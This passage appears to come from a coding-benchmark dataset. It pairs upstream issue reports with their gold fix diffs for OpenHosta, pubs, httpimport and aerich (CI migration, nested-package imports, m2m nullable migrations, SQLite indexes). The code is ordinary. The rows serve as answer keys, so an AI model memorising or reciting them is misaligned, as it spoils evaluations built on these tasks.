+ total_time = total_end - total_start
+ if verbose:
+ print(f"\033[92mTraining complete : Loss: {loss.item()} in a total of {total_time} sec\033[0m", flush=True)
+
+ torch.save(self.state_dict(), path+"/model.pth")
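The `create_model` method in the diff above derives the layer stack from `hidden_size_<n>` keys in the config, sorting them by numeric suffix. That key-parsing step can be exercised in isolation (a sketch; `layer_sizes` is a hypothetical helper name, not part of the library):

```python
def layer_sizes(config):
    # Collect hidden_size_<n> entries, ordered by their numeric suffix,
    # and sandwich them between the input and output sizes.
    hidden = sorted(
        (int(key.split("_")[-1]), size)
        for key, size in config.items()
        if key.startswith("hidden_size_") and key.split("_")[-1].isdigit()
    )
    return [config["input_size"]] + [s for _, s in hidden] + [config["output_size"]]

config = {"input_size": 4, "hidden_size_2": 16, "hidden_size_1": 8, "output_size": 1}
print(layer_sizes(config))  # [4, 8, 16, 1]
```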
diff --git a/src/OpenHosta/predict.py b/src/OpenHosta/predict.py
new file mode 100644
index 0000000..c468a02
--- /dev/null
+++ b/src/OpenHosta/predict.py
@@ -0,0 +1,195 @@
+import os
+
+import pickle
+from .cache import Hostacache
+from .builder import Builder
+from .datapreparator import Datapreparator
+from .example import type_verificator
+from .emulate import _exec_emulate
+
+from typing import Any
+import inspect
+
+CACHE_DIR = "__hostacache__"
+os.makedirs(CACHE_DIR, exist_ok=True)
+
+def _exec_predict(
+ _function_infos: dict = None,
+ _function_obj: object = None,
+
+ encoder = None,
+ decoder = None,
+ verbose: bool = False,
+ prediction: list = [],
+ complexity: int = None,
+ config: dict = None,
+ optimizer: str = None,
+ loss: str = None,
+ epochs: int = None,
+ get_loss: float = 0.0,
+ batch_size: int = None,
+ force_train: bool = False,
+ norm_max: float = None,
+ norm_min: float = None,
+ continue_training: bool = False,
+ normalization: bool = False
+):
+ hidden_dir = os.path.join(CACHE_DIR, f".model_{_function_obj.__name__}_{_function_infos['hash_function']}")
+ os.makedirs(hidden_dir, exist_ok=True)
+
+ config_path = os.path.join(hidden_dir, "config.json")
+ weight_path = os.path.join(hidden_dir, "model.pth")
+ normalisation_path = os.path.join(hidden_dir, "normalisation.json")
+
+ preparator = Datapreparator(norm_max, norm_min, encoder, decoder)
+ builder = Builder(hidden_dir)
+
+ if not os.path.exists(config_path) or not os.path.exists(weight_path) or force_train==True:
+
+ train, val = preparator.prepare(_function_infos, prediction)
+
+ if normalization:
+ train, val = preparator.normalize_dataset(train,val)
+ preparator.save_normalization_params(normalisation_path)
+ len_input = len(train[0][0])
+ len_output = len(train[0][1])
+ builder.build(len_input, len_output, complexity, config, optimizer, loss)
+ if batch_size is None:
+ batch_size = int(0.05 * len(train)) if 0.05 * len(train) > 1 else len(train) # 5% of the dataset or len(train) if len(train)
+ else:
+ batch_size = batch_size
+ save_len = len(train)
+ train, eval = preparator.split(train, val, batch_size)
+ epochs = int(2*save_len / batch_size if batch_size != save_len else 2*save_len) if epochs is None else epochs
+ assert epochs > 0, "epochs must be greater than 0 now it's {epochs}"
+ builder.trains(config, train, eval, epochs=epochs, verbose=verbose, get_loss=get_loss, continue_training=continue_training)
+ else:
+ if verbose:
+ print("\033[93mModel already trained, skipping training\033[0m")
+ if normalization:
+ preparator.load_normalization_params(normalisation_path)
+ if _function_infos["function_args"] != {}:
+ inference = preparator.prepare_input(_function_infos["function_args"])
+ if normalization:
+ inference = preparator.normalize_inference(inference)
+ torch_inference = preparator.convert(inference)
+
+ prediction = builder.load_inference(config_path, weight_path, torch_inference)
+ if normalization:
+ prediction_denormalize = preparator.denormalize_prediction(prediction)
+ result = float(prediction_denormalize[0])
+ else:
+ result = float(prediction.detach().cpu().numpy()[0])
+ return result
+
+
+def continue_train(func_obj, epochs=None, get_loss=None, verbose=False):
+ """
+ Continue the training of the model
+ - Reload a pth and add a dataset or not for the model
+ save a new pth after the training decided in the emulate or not or in this function also (diff parameters
+ of training and not architecture)
+ """
+ infos_cache = load_cache(func_obj)
+ return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=True ,continue_training=True, epochs=epochs, get_loss=get_loss, verbose=verbose)
+
+
+def get_input_types_from_signature(func_obj):
+ """
+ Extract input type from function signature
+ """
+ signature = inspect.signature(func_obj)
+ input_type = {}
+ for name, param in signature.parameters.items():
+ if param.annotation != inspect.Parameter.empty:
+ input_type[name] = param.annotation
+ else:
+ input_type[name] = Any
+ return input_type
+
+
+def emulate_verificator(args, kwargs, input_type, func, example_dict):
+ """
+ Vérifie les types des arguments positionnels et nommés lors de l'appel à emulate.
+ Met à jour example_dict avec les valeurs validées.
+ """
+ param_names = list(input_type.keys())
+
+ total_args_provided = len(args) + len(kwargs)
+ total_args_expected = len(param_names)
+
+ if total_args_provided != total_args_expected:
+ raise ValueError(
+ f"Incorrect number of arguments for function '{func.__name__}', "
+ f"expected {total_args_expected}, got {total_args_provided}."
+ )
+
+ for i, arg in enumerate(args):
+ param_name = param_names[i]
+ expected_type = input_type[param_name]
+
+ if not isinstance(arg, expected_type):
+ raise TypeError(
+ f"Positional argument '{param_name}'={arg} does not match the expected type "
+ f"{expected_type} in function '{func.__name__}'."
+ )
+ example_dict[param_name] = arg
+
+ for key, value in kwargs.items():
+ if key not in input_type:
+ raise ValueError(
+ f"Unexpected named argument '{key}' for function '{func.__name__}'."
+ )
+ expected_type = input_type[key]
+
+ if not isinstance(value, expected_type):
+ raise TypeError(
+ f"Named argument '{key}'={value} does not match the expected type "
+ f"{expected_type} in function '{func.__name__}'."
+ )
+ example_dict[key] = value
+
+
+def to_emulate(*args, func_obj, model=None, l_creativity=None, l_diversity=None, **kwargs):
+ """
+ Emulate the function with the given arguments and keyword arguments.
+ """
+ infos_cache = load_cache(func_obj)
+ input_type = get_input_types_from_signature(func_obj)
+
+ example_dict = {}
+
+ emulate_verificator(args=args, kwargs=kwargs, input_type=input_type, func=func_obj, example_dict=example_dict)
+ infos_cache["function_args"] = example_dict
+ infos_cache["function_call"] = f"{func_obj.__name__}({', '.join([f'{k}={v}' for k, v in example_dict.items()])})"
+ return _exec_emulate(_infos=infos_cache, _obj=func_obj, model=model, l_creativity=l_creativity, l_diversity=l_diversity)
+
+
+def load_cache(func_obj):
+ func_name = func_obj.__name__
+ path_name = os.path.join(CACHE_DIR, f"{func_name}.openhc")
+
+ if os.path.exists(path_name):
+ with open(path_name, "rb") as f:
+ cached_data = pickle.load(f)
+ return cached_data
+ else:
+ raise ValueError(f"Cache not found for function '{func_name}'.")
+
+
+def retrain(func_obj=None, force_train=True, epochs=None, get_loss=None, verbose=False):
+
+ infos_cache = load_cache(func_obj)
+ return _exec_predict(_function_infos=infos_cache, _function_obj=func_obj, force_train=force_train, epochs=epochs, get_loss=get_loss, verbose=verbose)
+
+
+
+
+
+
+
+
+
+
+
+
diff --git a/src/OpenHosta/requirements.txt b/src/OpenHosta/requirements.txt
new file mode 100644
index 0000000..32c71f3
--- /dev/null
+++ b/src/OpenHosta/requirements.txt
@@ -0,0 +1,5 @@
+Flask==3.0.3
+PyYAML==6.0.2
+pydantic==2.8.2
+Jinja2==3.1.4
+pyreadline3==3.4.1
\ No newline at end of file
diff --git a/src/OpenHosta/thought.py b/src/OpenHosta/thought.py
index 7547f73..ef059de 100644
--- a/src/OpenHosta/thought.py
+++ b/src/OpenHosta/thought.py
@@ -73,3 +73,4 @@ def inner_func(*args, **kwargs):
return result
return inner_func
+
\ No newline at end of file
diff --git a/src/OpenHosta/trainset.py b/src/OpenHosta/trainset.py
new file mode 100644
index 0000000..c2b1cfc
--- /dev/null
+++ b/src/OpenHosta/trainset.py
@@ -0,0 +1,59 @@
+import inspect
+
+from .cache import Hostacache
+from .example import type_verificator
+from .config import DefaultManager
+from .predict import load_cache
+
+l_default = DefaultManager.get_default_model()
+
+class TrainingSet():
+ def __init__(self, func : callable):
+ assert callable(func), "Please provide an hosta-injected function"
+ self.func = func
+ self.infos_cache = None
+
+ def visualize(self):
+ """
+ function for visualize the training set idk how for now
+ maybe let the hostashpère do it
+ """
+ hosta_cache = load_cache(self.func)
+ print("ho_example:")
+ for i in range(len(hosta_cache["ho_example"])):
+ print(hosta_cache["ho_example"][i])
+ print("ho_data:")
+ for i in range(len(hosta_cache["ho_data"])):
+ print(hosta_cache["ho_data"][i])
+ return [hosta_cache["ho_example"], hosta_cache["ho_data"]]
+
+ def add(self, *args, hosta_out=None,**kwargs):
+ """
+ function for add an example to the training set
+ """
+ input_type = {}
+ output_type = {}
+ data_dict = {}
+ hosta_func = self.func
+
+ if hosta_out is None:
+ raise ValueError("Please provide hosta_out for output.")
+ if hosta_func is None:
+ raise ValueError("Please provide hosta_func for specifying the function")
+ elif callable(hosta_func):
+ func = hosta_func
+ else:
+ raise ValueError("Please provide hosta_func for specifying the function")
+
+ try:
+ sig = inspect.signature(func)
+ for param in sig.parameters.values():
+ input_type[param.name] = param.annotation
+ output_type["hosta_out"] = sig.return_annotation
+ except:
+ raise ValueError("Function does not have a signature")
+
+ type_verificator(args, kwargs, input_type, output_type, hosta_out, func, data_dict)
+ cache_id = "ho_data"
+ cache = Hostacache(func, cache_id, data_dict)
+ cache.create_hosta_cache()
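Several of these diffs route argument checking through `type_verificator`, which compares call arguments against the function's annotations obtained via `inspect.signature`. A minimal sketch of that pattern (the `check_call` name is made up for illustration and handles only positional arguments):

```python
import inspect

def check_call(func, *args):
    sig = inspect.signature(func)
    for arg, param in zip(args, sig.parameters.values()):
        # Compare each positional argument against its annotation.
        if not isinstance(arg, param.annotation):
            raise TypeError(
                f"{param.name} expected {param.annotation.__name__}, got {type(arg).__name__}"
            )

def add(x: int, y: int) -> int:
    return x + y

check_call(add, 1, 2)  # passes silently
try:
    check_call(add, 1, "2")
except TypeError as e:
    print(e)  # y expected int, got str
```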
| Merge v1.1 to v1.2beta 2
| 2024-10-14T08:32:09 | 0.0 | [] | [] |
|||
pubs/pubs | pubs__pubs-260 | 96cce2cab5b4f3016bbcf7b08c2bd4fd8108d3e1 | diff --git a/.travis.yml b/.travis.yml
deleted file mode 100644
index a03b5d2d..00000000
--- a/.travis.yml
+++ /dev/null
@@ -1,89 +0,0 @@
-# list of environments to test
-matrix:
- include:
-
- # Full tests (with online API)
- - os: linux
- language: python
- python: 3.9
- dist: xenial
- sudo: true
- env:
- - TO_TEST=TEST_FULL
- - os: osx
- language: generic
- python: ">=3.6"
- env:
- - TO_TEST=TEST_FULL
- before_install:
- - brew outdated python3 || brew install python3 || brew upgrade python3
- - python3 -m venv env
- - source env/bin/activate
-
- # Mock tests (with mock API)
- - os: linux
- language: python
- python: 3.6
- env:
- - TO_TEST=TEST_MOCK
- - os: linux
- language: python
- dist: xenial
- python: 3.7
- sudo: true
- env:
- - TO_TEST=TEST_MOCK
- - os: linux
- language: python
- dist: xenial
- python: 3.8
- sudo: true
- env:
- - TO_TEST=TEST_MOCK
- - os: linux
- language: python
- dist: xenial
- python: 3.9
- sudo: true
- env:
- - TO_TEST=TEST_MOCK
-
-
- # Install tests
- - os: linux
- language: python
- python: 2.7
- env:
- - TO_TEST=INSTALL
- if: type = cron
- - os: linux
- language: python
- dist: xenial
- sudo: true
- python: 3.9
- env:
- - TO_TEST=INSTALL
- if: type = cron
- - os: osx
- language: generic
- python: 2.7
- env:
- - TO_TEST=INSTALL
- if: type = cron
- - os: osx
- language: generic
- python: ">=3.6"
- env:
- - TO_TEST=INSTALL
- if: type = cron
-
- allow_failures:
- - python: 2.7
-
-# command to run tests
-script:
- - python --version
- - if [ "$TO_TEST" = "TEST_MOCK" ] ||
- [ "$TO_TEST" = "TEST_FULL" ]; then PUBS_TESTS_MODE=MOCK python setup.py test; fi
- - if [ "$TO_TEST" = "TEST_FULL" ]; then PUBS_TESTS_MODE=COLLECT python setup.py test; fi
- - if [ "$TO_TEST" = "INSTALL" ]; then pip install -U pip && pip install pubs && pubs --help && pip uninstall -y pubs; fi
diff --git a/changelog.md b/changelog.md
index 0a251163..ca05610c 100644
--- a/changelog.md
+++ b/changelog.md
@@ -7,6 +7,7 @@
### Implemented enhancements
+- Migration from Travis CI to Github actions ([#260](https://github.com/pubs/pubs/pull/260))
- Allow passing named arguments to custom commands ([#241](https://github.com/pubs/pubs/pull/241) by [jkulhanek](https://github.com/jkulhanek))
- Added support for non-standard bibtex types, e.g. @collection, @software, etc. ([#226](https://github.com/pubs/pubs/pull/226))
- The number of displayed authors in listings is now configurable, as the `max_authors` value in the `main` section of the configuration. ([#225](https://github.com/pubs/pubs/pull/225))
@@ -15,6 +16,7 @@
### Fixed bugs
+- Fixed collision when entry uses `type` field ([#252](https://github.com/pubs/pubs/pull/252))
- Note on comma in alias descriptions ([#240](https://github.com/pubs/pubs/pull/240) [StanczakDominik](https://github.com/StanczakDominik))
- Note path correctly expand user '~' ([#250](https://github.com/pubs/pubs/pull/250))
- Tests don't run on python 2.7 or <=3.4. They may still work, but support will not be tested and will eventually be dropped. ([#223](https://github.com/pubs/pubs/pull/223))
diff --git a/dev_requirements.txt b/dev_requirements.txt
index b9879c5a..0b107fba 100644
--- a/dev_requirements.txt
+++ b/dev_requirements.txt
@@ -20,8 +20,6 @@ six
# those are the additional packages required to run the tests
pyfakefs
certifi
-# FIXME: remove strict version when https://github.com/datadriventests/ddt/issues/83 is fixed.
-# (also remove in setup.py)
-ddt==1.3.1
+ddt>=1.4.1
mock
pytest
diff --git a/pubs/plugs/git/git.py b/pubs/plugs/git/git.py
index 5be92218..3bff3d6a 100644
--- a/pubs/plugs/git/git.py
+++ b/pubs/plugs/git/git.py
@@ -16,11 +16,13 @@
class GitPlugin(PapersPlugin):
- """The git plugin creates a git repository in the pubs directory and commit the changes
- to the pubs repository everytime a paper is modified.
+ """Make the pubs repository also a git repository.
- It also add the `pubs git` subcommand, so git commands can be executed in the git repository
- from the command line.
+ The git plugin creates a git repository in the pubs directory
+ and commit the changes to the pubs repository.
+
+ It also add the `pubs git` subcommand, so git commands can be executed
+ in the git repository from the command line.
"""
name = 'git'
@@ -28,10 +30,10 @@ class GitPlugin(PapersPlugin):
def __init__(self, conf, ui):
self.ui = ui
- self.pubsdir = os.path.expanduser(conf['main']['pubsdir'])
- self.manual = conf['plugins'].get('git', {}).get('manual', False)
+ self.pubsdir = os.path.expanduser(conf['main']['pubsdir'])
+ self.manual = conf['plugins'].get('git', {}).get('manual', False)
self.force_color = conf['plugins'].get('git', {}).get('force_color', True)
- self.quiet = conf['plugins'].get('git', {}).get('quiet', True)
+ self.quiet = conf['plugins'].get('git', {}).get('quiet', True)
self.list_of_changes = []
self._gitinit()
@@ -72,17 +74,18 @@ def shell(self, cmd, input_stdin=None, command=False):
"""
colorize = ' -c color.ui=always' if self.force_color else ''
git_cmd = 'git -C {}{} {}'.format(self.pubsdir, colorize, cmd)
- #print(git_cmd)
p = Popen(git_cmd, stdin=PIPE, stdout=PIPE, stderr=STDOUT, shell=True)
output, err = p.communicate(input_stdin)
p.wait()
if p.returncode != 0:
- raise RuntimeError('The git plugin encountered an error when running the git command:\n' +
- '{}\n\nReturned output:\n{}\n'.format(git_cmd, output.decode('utf-8')) +
- 'If needed, you may fix the state of the {} git repository '.format(self.pubsdir) +
- 'manually.\nIf relevant, you may submit a bug report at ' +
- 'https://github.com/pubs/pubs/issues')
+ raise RuntimeError((
+ 'The git plugin encountered an error when running the git command:\n'
+ '{}\n\n'
+ 'Returned output:\n{}\n'
+ 'If needed, you may fix the state of the {} git repository manually.\n'
+ 'If relevant, you may submit a bug report at https://github.com/pubs/pubs/issues'
+ ).format(git_cmd, output.decode('utf-8'), self.pubsdir))
elif command:
self.ui.message(output.decode('utf-8'), end='')
elif not self.quiet:
@@ -97,10 +100,11 @@ def paper_change_event(event):
git = GitPlugin.get_instance()
if not git.manual:
event_desc = event.description
- for a, b in [('\\','\\\\'), ('"','\\"'), ('$','\\$'), ('`','\\`')]:
+ for a, b in [('\\', '\\\\'), ('"', '\\"'), ('$', '\\$'), ('`', '\\`')]:
event_desc = event_desc.replace(a, b)
git.list_of_changes.append(event_desc)
+
@PostCommandEvent.listen()
def git_commit(event):
if GitPlugin.is_loaded():
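The `paper_change_event` hook above escapes commit-message text before it is interpolated into a double-quoted shell string. The escape loop can be checked on its own (a sketch mirroring the plugin's replacement table; note backslash must be escaped first):

```python
def escape_for_double_quotes(text):
    # Backslash first, then the characters that stay special
    # inside double quotes: " $ `
    for raw, esc in [('\\', '\\\\'), ('"', '\\"'), ('$', '\\$'), ('`', '\\`')]:
        text = text.replace(raw, esc)
    return text

print(escape_for_double_quotes('added "paper" for $USER'))
# added \"paper\" for \$USER
```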
diff --git a/setup.py b/setup.py
index f5e45d28..011ad683 100644
--- a/setup.py
+++ b/setup.py
@@ -60,7 +60,7 @@ def pubs_test_suite():
],
test_suite='tests',
- tests_require=['pyfakefs>=3.4', 'mock', 'ddt==1.3.1', 'certifi', 'pytest'],
+ tests_require=['pyfakefs>=3.4', 'mock', 'ddt>=1.4.1', 'certifi', 'pytest'],
# in order to avoid 'zipimport.ZipImportError: bad local file header'
zip_safe=False,
| Fix continuous integration
Whether by fixing Travis or switching to GitHub Actions.
| 2021-01-26T07:29:26 | 0.0 | [] | [] |
|||
operatorequals/httpimport | operatorequals__httpimport-41 | 2afc661025060ce8d8ed1a6f6cbde99e2304fedf | diff --git a/httpimport.py b/httpimport.py
index 316bfe2..b59d9a5 100644
--- a/httpimport.py
+++ b/httpimport.py
@@ -117,17 +117,19 @@ def __init__(self, base_url, zip_pwd=None):
def _mod_to_filepaths(self, fullname, compiled=False):
suffix = '.pyc' if compiled else '.py'
- # get the python module name
- py_filename = fullname.replace(".", os.sep) + suffix
- # get the filename if it is a package/subpackage
- py_package = fullname.replace(
- ".", os.sep, fullname.count(".") - 1) + "/__init__" + suffix
-
if self.is_archive:
+ # get the python module name
+ py_filename = fullname.replace(".", os.sep) + suffix
+ # get the filename if it is a package/subpackage
+ py_package = fullname.replace(
+ ".", os.sep, fullname.count(".") - 1) + "/__init__" + suffix
return {'module': py_filename, 'package': py_package}
else:
# if self.in_progress:
- # py_package = fullname.replace(".", '/') + "/__init__" + suffix
+ # get the python module name
+ py_filename = fullname.replace(".", '/') + suffix
+ # get the filename if it is a package/subpackage
+ py_package = fullname.replace(".", '/') + "/__init__" + suffix
return {
'module': self.base_url + py_filename,
'package': self.base_url + py_package
@@ -221,8 +223,16 @@ def load_module(self, name):
if module_type == 'package':
mod.__package__ = name
else:
- mod.__package__ = name.split('.')[0]
-
+ #check if this could be a nested package
+ if len(name.split('.')[:-1]) > 1:
+ #recursively find the package
+ pkg_name = '.'.join(name.split('.')[:-1])
+ while sys.modules[pkg_name].__package__ != pkg_name:
+ pkg_name = '.'.join(pkg_name.split('.')[:-1])
+ mod.__package__ = pkg_name
+ #if this could not be nested, we just use it's own name
+ else:
+ mod.__package__ = name.split('.')[0]
try:
mod.__path__ = ['/'.join(mod.__file__.split('/')[:-1]) + '/']
except:
| Relative Path Importing/incorrect import package
This is heavily related to #28, though I believe they were half way incorrect when they said importing a second time would result in a working execution. Based on what I've seen, when the import fails it ends up in a half-way state where the import isn't shown in globals() or dir(), but can be seen from sys.modules(). This breaks some stuff and likely won't result in an actually working function/module.
Took some time to dig into this issue and it's not actually an issue with relative path imports, that's more of a symptom, the actual issue stems from the fact that nested modules don't get the proper value set for their `__package__` attribute.
This is caused by line 224 in the current code where, no matter what the path is, it splits the dotted name, grabs the first item, and uses that as the package. So, for example:
```
Package1_
|_Module1
|_Package2_
|_Module2
|_Module3
```
If you have the file structure above and Module3 contains `from . import Module2`, that import will fail, because Python uses the `__package__` attribute to resolve relative imports and all of these modules have Package1 as their `__package__`.
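The patched logic walks up the dotted name until it reaches a module that is itself a package. A stdlib-only sketch of that resolution (the explicit `modules` argument and the fake module table are illustrative additions, so the logic can be exercised without a live import):

```python
import sys
from types import SimpleNamespace

def resolve_package(name, module_type, modules=None):
    """Sketch of the patched __package__ resolution for nested modules."""
    modules = sys.modules if modules is None else modules
    if module_type == 'package':
        return name
    parents = name.split('.')[:-1]
    if len(parents) > 1:
        # walk up the dotted path until we hit a module whose __package__
        # names itself, i.e. an actual package
        pkg_name = '.'.join(parents)
        while modules[pkg_name].__package__ != pkg_name:
            pkg_name = '.'.join(pkg_name.split('.')[:-1])
        return pkg_name
    # not nested: fall back to the old behaviour
    return name.split('.')[0]

# Mimic the Package1/Package2 layout from the tree above
fake = {
    'Package1': SimpleNamespace(__package__='Package1'),
    'Package1.Package2': SimpleNamespace(__package__='Package1.Package2'),
}
print(resolve_package('Package1.Package2.Module3', 'module', fake))  # Package1.Package2
print(resolve_package('Package1.Module1', 'module', fake))           # Package1
```

With this, Module3 gets `Package1.Package2` as its `__package__`, so a relative import resolves against the right parent.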
| 2022-12-18T07:22:51 | 0.0 | [] | [] |
|||
tortoise/aerich | tortoise__aerich-385 | 56eff1b22f2143c646dd4a2144493b97ef0da211 | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 7c7f91d..f518021 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### [0.8.1](Unreleased)
#### Fixed
+- Setting null=false on m2m field causes migration to fail. (#334)
- Fix NonExistentKey when running `aerich init` without `[tool]` section in config file. (#284)
- Fix configuration file reading error when containing Chinese characters. (#286)
- sqlite: failed to create/drop index. (#302)
diff --git a/aerich/migrate.py b/aerich/migrate.py
index ed1605c..5429ac8 100644
--- a/aerich/migrate.py
+++ b/aerich/migrate.py
@@ -275,8 +275,8 @@ def diff_models(
length = len(old_m2m_fields)
field_index = {f["name"]: i for i, f in enumerate(new_m2m_fields)}
new_m2m_fields.sort(key=lambda field: field_index.get(field["name"], length))
- for action, _, change in diff(old_m2m_fields, new_m2m_fields):
- if change[0][0] == "db_constraint":
+ for action, option, change in diff(old_m2m_fields, new_m2m_fields):
+ if (option and option[-1] == "nullable") or change[0][0] == "db_constraint":
continue
new_value = change[0][1]
if isinstance(new_value, str):
| Setting null = false on m2m fields causes migration to fail
I have a m2m field as follows:
```py
class Contact(RootModel):
categories = fields.ManyToManyField('core.ContactCategory',
related_name='contacts', through='fkcontactcategory',
description="Categories", on_delete=fields.SET_NULL)
```
I set null=False on the field:
`categories = fields.ManyToManyField('core.ContactCategory', related_name='contacts', null=False, through='fkcontactcategory', description="Categories", on_delete=fields.SET_NULL)`
When performing the migration using command.migrate(app_name) I run into an error:
**'bool' object is not subscriptable**
Any help would be appreciated.
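For context on the `'bool' object is not subscriptable` error: when only `null` changes, the dict-diff entry carries a bare bool as its new value, so the old `change[0][0]` indexing blows up. A stdlib sketch of the shapes involved (the tuples mimic what dictdiffer emits, which is an assumption here; the guard mirrors the patch):

```python
def filter_m2m_changes(diff_entries):
    """Skip nullable/db_constraint changes, as the patched diff_models does."""
    kept = []
    for action, option, change in diff_entries:
        if (option and option[-1] == "nullable") or change[0][0] == "db_constraint":
            continue
        kept.append((action, option, change))
    return kept

# A nullable-only edit shows up roughly like this:
nullable_change = ("change", [0, "nullable"], (True, False))

# Without the option guard, change[0][0] evaluates (True, False)[0][0],
# i.e. True[0], which is exactly the reported crash:
try:
    nullable_change[2][0][0]
except TypeError as exc:
    print(exc)  # 'bool' object is not subscriptable

# With the guard, the nullable-only change is simply skipped:
print(filter_m2m_changes([nullable_change]))  # []
```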
| 2024-12-11T13:02:22 | 0.0 | [] | [] |
|||
tortoise/aerich | tortoise__aerich-381 | 3d840395f17211bb0591174aed2b3c9c310ed08f | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 1ff66ca..7c7f91d 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### [0.8.1](Unreleased)
#### Fixed
+- Fix NonExistentKey when running `aerich init` without `[tool]` section in config file. (#284)
- Fix configuration file reading error when containing Chinese characters. (#286)
- sqlite: failed to create/drop index. (#302)
- PostgreSQL: Cannot drop constraint after deleting or rename FK on a model. (#378)
diff --git a/aerich/cli.py b/aerich/cli.py
index 25aeb8c..b5d446d 100644
--- a/aerich/cli.py
+++ b/aerich/cli.py
@@ -190,7 +190,10 @@ async def init(ctx: Context, tortoise_orm, location, src_folder) -> None:
table["tortoise_orm"] = tortoise_orm
table["location"] = location
table["src_folder"] = src_folder
- doc["tool"]["aerich"] = table
+ try:
+ doc["tool"]["aerich"] = table
+ except KeyError:
+ doc["tool"] = {"aerich": table}
config_path.write_text(tomlkit.dumps(doc))
| NonExistentKey when running `aerich init`
```
# aerich init -t project.settings.DATABASE
...
File "/usr/local/lib/python3.11/site-packages/aerich/cli.py", line 205, in init
doc["tool"]["aerich"] = table
~~~^^^^^^^^
File "/usr/local/lib/python3.11/site-packages/tomlkit/container.py", line 650, in __getitem__
raise NonExistentKey(key)
tomlkit.exceptions.NonExistentKey: 'Key "tool" does not exist.'
```
My `pyproject.toml`:
```toml
[project]
name = "project"
classifiers = ["Private :: Do Not Upload"]
version = "0"
dependencies = [
"fastapi ~= 0.89.1",
# DB
"tortoise-orm[accel,asyncpg] ~= 0.19.2",
"aerich ~= 0.7.1",
]
[project.optional-dependencies]
dev = [
"pytest ~= 7.2.1",
"isort ~= 5.11.4",
"flake8 ~= 5.0.4",
"ipython",
]
```
| I've just had the same issue. This is because `aerich init` assumes the `[tool]` section exists in `pyproject.toml`. You can work around that by creating the section yourself, but `aerich` should check if it exists first...
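A minimal sketch of such a guard (plain dicts stand in for tomlkit containers here; tomlkit's `NonExistentKey` is a `KeyError` subclass, so the same pattern applies):

```python
def write_aerich_config(doc, table):
    """Create the [tool] table on demand before writing [tool.aerich]."""
    try:
        doc["tool"]["aerich"] = table
    except KeyError:  # no [tool] section yet
        doc["tool"] = {"aerich": table}
    return doc

cfg = {"tortoise_orm": "settings.TORTOISE_ORM", "location": "./migrations"}
# Works whether or not [tool] already exists:
print(write_aerich_config({}, cfg))
print(write_aerich_config({"tool": {"poetry": {}}}, cfg))
```

Note the except branch only runs when `[tool]` is missing, so an existing `[tool.poetry]` (or any other tool table) is preserved.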
I also have faced this issue. Is there any solution?
The solution is to create a `pyproject.toml` file in your project root.
Here is my TOML file; please customize it as needed:
```
[project]
name = "project_name"
classifiers = ["Private :: Do Not Upload"]
version = "1"
dependencies = [
"blacksheep==2.0.7",
# DB
"tortoise-orm[asyncpg] ~= 0.21.3",
"aerich ~= 0.7.2",
]
[project.optional-dependencies]
dev = [
]
[tool.setuptools.packages]  # this is important: without this section you will get an error
find = {} # Scanning implicit namespaces is active by default
```
I tried to run `aerich init` and received the same error.
Probably unrelated, but for reference, here is my full command:
`docker compose exec server uv run aerich init -t app.db.TORTOISE_ORM`
In my case I already had `pyproject.toml` in the project root directory.
I manually added an empty `[tool.aerich]` table at the end of the file:
```pyproject.toml
[project]
name = "project"
version = "0.1.0"
# ...
[tool.aerich]
```
I reran the command and initialization completed successfully.
In my case it added the following:
```pyproject.toml
# ...
[tool.aerich]
tortoise_orm = "app.db.TORTOISE_ORM"
location = "./migrations"
src_folder = "./."
``` | 2024-12-11T05:25:35 | 0.0 | [] | [] |
||
tortoise/aerich | tortoise__aerich-379 | c2ebe9b5e41ece1dd2800929e7bb5bc993a1e83a | diff --git a/CHANGELOG.md b/CHANGELOG.md
index 6093d90..1b2fe83 100644
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -5,6 +5,7 @@
### [0.8.1](Unreleased)
#### Fixed
+- sqlite: failed to create/drop index. (#302)
- PostgreSQL: Cannot drop constraint after deleting or rename FK on a model. (#378)
- Sort m2m fields before comparing them with diff. (#271)
diff --git a/aerich/ddl/__init__.py b/aerich/ddl/__init__.py
index cb57274..11b355d 100644
--- a/aerich/ddl/__init__.py
+++ b/aerich/ddl/__init__.py
@@ -3,6 +3,7 @@
from tortoise import BaseDBAsyncClient, Model
from tortoise.backends.base.schema_generator import BaseSchemaGenerator
+from tortoise.backends.sqlite.schema_generator import SqliteSchemaGenerator
from aerich.utils import is_default_function
@@ -122,7 +123,12 @@ def _add_or_modify_column(self, model, field_describe: dict, is_pk: bool, modify
unique = ""
template = self._MODIFY_COLUMN_TEMPLATE
else:
- unique = "UNIQUE" if field_describe.get("unique") else ""
+ # sqlite does not support alter table to add unique column
+ unique = (
+ "UNIQUE"
+ if field_describe.get("unique") and self.DIALECT != SqliteSchemaGenerator.DIALECT
+ else ""
+ )
template = self._ADD_COLUMN_TEMPLATE
return template.format(
table_name=db_table,
diff --git a/aerich/ddl/sqlite/__init__.py b/aerich/ddl/sqlite/__init__.py
index 0ce1290..67dfd3a 100644
--- a/aerich/ddl/sqlite/__init__.py
+++ b/aerich/ddl/sqlite/__init__.py
@@ -10,6 +10,8 @@
class SqliteDDL(BaseDDL):
schema_generator_cls = SqliteSchemaGenerator
DIALECT = SqliteSchemaGenerator.DIALECT
+ _ADD_INDEX_TEMPLATE = 'CREATE {unique}INDEX "{index_name}" ON "{table_name}" ({column_names})'
+ _DROP_INDEX_TEMPLATE = 'DROP INDEX IF EXISTS "{index_name}"'
def modify_column(self, model: "Type[Model]", field_object: dict, is_pk: bool = True):
raise NotSupportError("Modify column is unsupported in SQLite.")
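For illustration, the new class-level templates are plain Python format strings; a hypothetical helper shows the SQLite DDL they expand to (the index naming here is simplified — aerich's real index names are truncated with a hash suffix):

```python
ADD_INDEX = 'CREATE {unique}INDEX "{index_name}" ON "{table_name}" ({column_names})'
DROP_INDEX = 'DROP INDEX IF EXISTS "{index_name}"'

def render_add_index(table, columns, unique=False):
    # Build the CREATE [UNIQUE] INDEX statement from the template
    return ADD_INDEX.format(
        unique="UNIQUE " if unique else "",
        index_name="idx_{}_{}".format(table, "_".join(columns)),
        table_name=table,
        column_names=", ".join(f'"{c}"' for c in columns),
    )

print(render_add_index("alert", ["acknowledged"]))
# CREATE INDEX "idx_alert_acknowledged" ON "alert" ("acknowledged")
print(DROP_INDEX.format(index_name="idx_alert_acknowledged"))
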